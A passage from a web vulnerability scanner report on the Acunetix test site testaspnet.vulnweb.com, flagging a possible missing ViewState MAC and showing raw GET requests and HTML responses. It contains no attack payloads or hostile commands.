style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (212 bytes)
GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cacheRequest body (0 bytes)
Response Status line and header section (296 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:15 GMT Content-Length: 13912Response body (13912 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/about.aspx
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (314 bytes)
GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:17 GMT Content-Length: 14467Response body (14467 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a 